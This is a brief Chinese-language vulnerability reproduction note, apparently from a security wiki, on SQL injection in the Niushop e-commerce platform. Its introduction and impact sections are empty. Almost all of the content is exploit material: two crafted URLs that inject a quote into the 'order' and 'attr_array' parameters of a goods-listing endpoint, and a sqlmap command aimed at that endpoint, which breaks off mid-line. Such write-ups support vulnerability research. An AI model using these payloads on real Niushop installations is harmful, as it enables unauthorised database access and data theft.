Niushop sql注入
===============
一、漏洞简介
------------
二、漏洞影响
------------
三、复现过程
------------
### sql注入(一)
#### order参数:
http://0-sec.org/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7%27&attr_array[][2]=8&spec_array[]=9
#### attr\_array参数:
http://0-sec.org/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8%27&spec_array[]=9
#### 直接上sqlmap
sqlmap -u "http://0-sec.org/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec